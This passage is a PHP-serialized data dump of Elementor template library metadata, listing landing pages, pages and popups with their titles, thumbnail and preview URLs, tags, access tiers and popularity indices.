5\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-5.jpg\";s:12:\"tmpl_created\";i:1653989135;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:202;a:20:{s:4:\"tmpl\";i:1217;s:2:\"id\";i:20333;s:5:\"title\";s:40:\"Plant Pots Online Shop &#8211; eCommerce\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Plant-Pots-Online-Shop-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634042184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/plant-pots-online-shop-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Ecommerce\",\"Landing Pages\",\"Online Shop\",\"Shop\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:203;a:20:{s:4:\"tmpl\";i:1211;s:2:\"id\";i:20447;s:5:\"title\";s:33:\"Shared Workspace &#8211; Business\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Shared-Workspace.jpg\";s:12:\"tmpl_created\";i:1633884934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/shared-workspace-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:28:\"[\"Business\",\"Landing Pages\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:204;a:20:{s:4:\"tmpl\";i:1237;s:2:\"id\";i:21313;s:5:\"title\";s:34:\"Spa &#038; Beauty &#8211; Services\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/12/Spa-Beauty-Treatments-page-1.jpg\";s:12:\"tmpl_created\";i:1638819709;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/spa-beauty-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:55:\"[\"Beauty\",\"Hair\",\"Health\",\"Services\",\"Spa\",\"Treatment\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:205;a:20:{s:4:\"tmpl\";i:1004;s:2:\"id\";i:13538;s:5:\"title\";s:32:\"Fly-In | Newsletter | Barbershop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/05/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1589893364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-newsletter-barbershop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:710;s:11:\"trend_index\";i:667;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:206;a:20:{s:4:\"tmpl\";i:924;s:2:\"id\";i:12550;s:5:\"title\";s:32:\"Fly-in | Sale | Travel and Tours\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_s.png\";s:12:\"tmpl_created\";i:1575960263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/flyin-sale-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:754;s:11:\"trend_index\";i:791;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:207;a:20:{s:4:\"tmpl\";i:1212;s:2:\"id\";i:20479;s:5:\"title\";s:49:\"Teeth Straightening &#8211; Health &#038; Fitness\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Teeth-Whitening.jpg\";s:12:\"tmpl_created\";i:1633886115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/teeth-straightening-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:46:\"[\"Business\",\"Dental\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:208;a:20:{s:4:\"tmpl\";i:1234;s:2:\"id\";i:21234;s:5:\"title\";s:34:\"Insurance Company &#8211; Services\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/15-Services-Insurance-Company.jpg\";s:12:\"tmpl_created\";i:1638818688;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/insurance-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Faq\",\"Form\",\"Insurance\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:209;a:20:{s:4:\"tmpl\";i:1035;s:2:\"id\";i:15062;s:5:\"title\";s:35:\"Fly-In | Sign up | Flooring Company\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp.png\";s:12:\"tmpl_created\";i:1597739629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/fly-in-sign-up-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:309;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:210;a:20:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:20394;s:5:\"title\";s:30:\"Time Management &#8211; Events\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/10/Time-Management-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884077;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/time-management-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:17:\"[\"Landing Pages\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:211;a:20:{s:4:\"tmpl\";i:1229;s:2:\"id\";i:21118;s:5:\"title\";s:28:\"Contact &#8211; Plants Store\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/12-Contact-Plants-Store.jpg\";s:12:\"tmpl_created\";i:1638802472;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/contact-plants-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:40:\"[\"Contact\",\"Info\",\"Plant\",\"Testimonial\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:212;a:20:{s:4:\"tmpl\";i:893;s:2:\"id\";i:11822;s:5:\"title\";s:30:\"Full Screen | Menu | Portfolio\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/PopUp_small.png\";s:12:\"tmpl_created\";i:1569429896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/full-screen-menu-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:626;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:213;a:20:{s:4:\"tmpl\";i:1203;s:2:\"id\";i:18591;s:5:\"title\";s:28:\"Coffee Sale &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280-7.png\";s:12:\"tmpl_created\";i:1633877319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/coffee-sale-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:33:\"[\"Coffee\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:214;a:20:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:21184;s:5:\"title\";s:28:\"Dental Care &#8211; Services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/14-Services-Dental-Care.jpg\";s:12:\"tmpl_created\";i:1638807148;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dental-care-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Dental\",\"Medical\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:215;a:20:{s:4:\"tmpl\";i:1064;s:2:\"id\";i:15580;s:5:\"title\";s:31:\"Fullscreen | Menu | Travel Blog\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1606215358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fullscreen-menu-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:348;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:216;a:20:{s:4:\"tmpl\";i:1133;s:2:\"id\";i:16645;s:5:\"title\";s:28:\"Headphones &#8211; eCommerce\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_headphones.png\";s:12:\"tmpl_created\";i:1609944115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/commerce-headphones/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:39:\"[\"Ecommerce\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:87;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:217;a:20:{s:4:\"tmpl\";i:1442;s:2:\"id\";i:24584;s:5:\"title\";s:27:\"Wireframe &#8211; Pricing 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Pricing-1.jpg\";s:12:\"tmpl_created\";i:1653989152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"Booking\",\"Business\",\"Clients\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Online Service\",\"Pricing\",\"Products\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:218;a:20:{s:4:\"tmpl\";i:1138;s:2:\"id\";i:16762;s:5:\"title\";s:25:\"Conference &#8211; Events\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Conference.png\";s:12:\"tmpl_created\";i:1610455119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/conference-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:60:\"[\"Conference\",\"Convention\",\"Event\",\"Events\",\"Landing Pages\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:216;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:219;a:20:{s:4:\"tmpl\";i:1438;s:2:\"id\";i:24539;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-2.jpg\";s:12:\"tmpl_created\";i:1653989019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"Business\",\"Contact\",\"Footer\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:220;a:20:{s:4:\"tmpl\";i:981;s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"Interior Design\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:763;s:11:\"trend_index\";i:679;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:221;a:20:{s:4:\"tmpl\";i:1052;s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:739;s:11:\"trend_index\";i:583;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:222;a:20:{s:4:\"tmpl\";i:1434;s:2:\"id\";i:24494;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1.jpg\";s:12:\"tmpl_created\";i:1653988874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Business\",\"Faq\",\"Footer\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:223;a:20:{s:4:\"tmpl\";i:1194;s:2:\"id\";i:18701;s:5:\"title\";s:32:\"Digital Course &#8211; eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280.jpg\";s:12:\"tmpl_created\";i:1618995134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/digital-course-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Ecommerce\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:224;a:20:{s:4:\"tmpl\";i:1192;s:2:\"id\";i:18612;s:5:\"title\";s:34:\"Bag Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bag-Product.jpeg\";s:12:\"tmpl_created\";i:1618395406;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bag-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:61:\"[\"Bag\",\"Ecommerce\",\"Landing Pages\",\"Product\",\"Sale\",\"Travel\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:875;s:11:\"trend_index\";i:605;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:225;a:20:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:21083;s:5:\"title\";s:26:\"Conference &#8211; Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/10-Contact-Conference.jpg\";s:12:\"tmpl_created\";i:1638799208;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/conference-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:44:\"[\"Conference\",\"Contact\",\"Form\",\"Info\",\"Map\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:226;a:20:{s:4:\"tmpl\";i:1193;s:2:\"id\";i:18644;s:5:\"title\";s:37:\"Camera Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/camera_sale_featured-img.jpg\";s:12:\"tmpl_created\";i:1618396388;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/camera-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Camera\",\"Ecommerce\",\"Landing Pages\",\"Photography\",\"Sale\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:873;s:11:\"trend_index\";i:535;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:227;a:20:{s:4:\"tmpl\";i:951;s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:734;s:11:\"trend_index\";i:686;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:228;a:20:{s:4:\"tmpl\";i:1222;s:2:\"id\";i:20960;s:5:\"title\";s:26:\"Travel Agency &#8211; Home\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/5-Home-Travel-Agency.jpg\";s:12:\"tmpl_created\";i:1638788432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/travel-agency-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Adventures\",\"Experience\",\"Explore\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:229;a:20:{s:4:\"tmpl\";i:1196;s:2:\"id\";i:18815;s:5:\"title\";s:25:\"Car Wash &#8211; 